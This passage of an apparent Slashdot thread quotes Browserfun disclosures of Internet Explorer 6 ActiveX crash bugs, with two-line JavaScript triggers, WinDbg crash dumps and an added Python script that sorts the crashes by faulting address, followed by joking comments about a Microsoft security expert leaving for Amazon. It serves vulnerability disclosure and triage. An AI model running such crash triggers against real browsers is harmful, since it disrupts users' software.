7dc995ad f60010 test byte ptr [eax],0x10 ds:0023:00000000=??

This bug was reported to Microsoft in March of 2006.


DirectAnimation.DAUserData Data

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The "Data" property of the DAUserData object is designed to be accessed only after it has been initialized. We can trigger a NULL dereference by asking for it without calling the Init() method first.

var a = new ActiveXObject('DirectAnimation.DAUserData');
a.Data = 'Hello';

eax=00000000 ebx=5a327320 ecx=00000000
edx=0003b7c8 esi=00000000 edi=0003f1cc
eip=5a3415b6 esp=0013b1a4 ebp=0013b1b4
danim!CRUserDataImpl::GetData+0x5:
5a3415b6 837e0800 cmp dword ptr [esi+0x8],0x0 ds:0023:00000008=????????

This bug was reported to Microsoft in March of 2006.


Object.Microsoft.DXTFilter Enabled

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. By setting the 'Enabled' property of this control to a true value, we can trigger a NULL dereference.

var a = new ActiveXObject('Object.Microsoft.DXTFilter');
a.Enabled = 1;

eax=00000000 ebx=6bdd4728 ecx=00001008
edx=001bffff esi=02910488 edi=00000000
eip=6bde8881 esp=0013b250 ebp=0013b258
dxtrans!CDXTFilter::put_Enabled+0x75:
6bde8881 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft in March of 2006.

For more Microsoft Internet Explorer bugs, see the Browserfun Blog [blogspot.com] .
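
Added example, not part of the comment above or of the Browserfun posts it quotes: a Python triage pass over the faulting-instruction lines from those six crash dumps, separating near-NULL dereferences from the one fault whose address is built from the 0x58 ('X') fill bytes used in the Internet.HHCtrl test. The bucket names, the 64 KB limit and the three-of-four-bytes rule are assumptions of this example.

```python
import re

# Symbol + faulting-instruction lines copied from the crash dumps quoted above.
CRASHES = """\
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??
urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????
mshtml!CTreePos::NextTreePos+0x23:
7dc995ad f60010 test byte ptr [eax],0x10 ds:0023:00000000=??
danim!CRUserDataImpl::GetData+0x5:
5a3415b6 837e0800 cmp dword ptr [esi+0x8],0x0 ds:0023:00000008=????????
dxtrans!CDXTFilter::put_Enabled+0x75:
6bde8881 8b08 mov ecx,[eax] ds:0023:00000000=????????
"""

SYMBOL = re.compile(r"^(?P<module>\w+)!(?P<func>.+)\+0x[0-9a-f]+:$")
# "ds:0023:00000000=????????" is segment:selector:address=value ('?' = unreadable)
ACCESS = re.compile(r"\b[a-z]s:[0-9a-f]{4}:(?P<addr>[0-9a-f]{8})=(?P<val>\?+|[0-9a-f]+)$")

# Assumption: the lowest 64 KB of a 32-bit Windows user process is normally
# unmapped, so a fault below this limit is treated as a NULL-pointer dereference.
NULL_REGION_LIMIT = 0x10000


def parse(text):
    """Return [(module, function, fault_address, readable)] for each record."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    records = []
    for sym_line, ins_line in zip(lines[0::2], lines[1::2]):
        sym, acc = SYMBOL.match(sym_line), ACCESS.search(ins_line)
        if not sym or not acc:
            raise ValueError(f"unrecognised record: {sym_line!r} / {ins_line!r}")
        readable = "?" not in acc["val"]
        records.append((sym["module"], sym["func"], int(acc["addr"], 16), readable))
    return records


def classify(addr, marker=0x58):
    """Rough triage bucket for a faulting address (a heuristic, not a verdict)."""
    if addr < NULL_REGION_LIMIT:
        return "near-null"
    # The address mostly consists of the tester's fill byte: the pointer was
    # overwritten with input data, so the crash deserves priority review.
    if sum(b == marker for b in addr.to_bytes(4, "big")) >= 3:
        return "marker-derived"
    return "other"


def triage(text=CRASHES, marker=0x58):
    """Map 'module!function' to its triage bucket."""
    return {f"{mod}!{func}": classify(addr, marker)
            for mod, func, addr, _ in parse(text)}


if __name__ == "__main__":
    for where, bucket in triage().items():
        print(f"{bucket:15} {where}")
```
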

My initial reaction (1)

ElephanTS (624421) | more than 8 years ago | (#15808171)

MS Security Guru

[snigger]

Re:My initial reaction (1)

Brother Seamus (937658) | more than 8 years ago | (#15808897)

And in other news... Jeff Bezos has hired Willie Nelson to do his taxes, Martha Stewart to handle his investments and Joseph Hazelwood to captain his yacht.

Resume (2, Funny)

jmurano (90735) | more than 8 years ago | (#15808295)

If I had been a 'senior security strategist' at Microsoft for the last five years... I'd leave that off of my resume!

Time To Stop Shopping at Amazon (1)

penguinstorm (575341) | more than 8 years ago | (#15808448)

Given how Microsoft's security track record has gone, I think I shall take my online books business to a new vendor.

Great (2, Funny)

/dev/trash (182850) | more than 8 years ago | (#15808659)

Free crap from Amazon this Christmas!

M$ Security Guru (1)

disturbedite (979015) | more than 8 years ago | (#15808680)

i didn't know there was such a thing

demotion? (1)

eliot1785 (987810) | more than 8 years ago | (#15808871)

This seems like a demotion to me. The security problems Amazon.com faces can't possibly be as big as the security problems Microsoft faces. It is relatively easy to harden a server farm, compared to making an operating system that can stay reasonably secure even when run by novices and below.

Re:demotion? (0)

Anonymous Coward | more than 8 years ago | (#15809723)

leaving the *impossible* for the possible might be worthwhile.

imho, though, he's jumped from one stagnating, albeit brutally rich, company for another company that may do even worse over the next 5 years or so.

Re:demotion? (1)

CxDoo (918501) | more than 8 years ago | (#15810523)

That's what occurred to me too.

The Cold War perspective (yay, another one defected from Evil Empire!) is amusing, but not very insightful. Why would someone of any ambition to leave a mark in OS security switch from MS to Amazon? It doesn't even compare.
I'd rather say the guy was not very important, was offered more money (i.e. not very important) or was ditched (...) .

Maybe he should get together... (1)

mcgroarty (633843) | more than 8 years ago | (#15809521)

Maybe he should get together with the Enron accounting guru.

Security Seminars (1)

York the Mysterious (556824) | more than 8 years ago | (#15809615)

I went to a MS security seminar where he was the presenter. He did a really amazing job and cracked a lot of MS jokes. Showed the lack of security in MS products and where it really wasn't as big as it was hyped to be. He was a great presenter and a nice guy. Helped me with some questions. MS lost a good employee here.

MS Security guru leaving for Amazon? (1)

onwardknave (533210) | more than 8 years ago | (#15810512)

Sweet! Free books and movies!

Simple word-counting (0)

Anonymous Coward | more than 8 years ago | (#15810528)

At the time I'm posting, I counted the occurrences of the word "chair" in the visible threads (threshold: 1).
It's 7 out of 72 threads. A clean 10% of posters give credit to Mr. Ballmer's habits.

Wait wait wait... (1)

Garridan (597129) | more than 8 years ago | (#15813124)

Microsoft has a security guru? What OS does he use?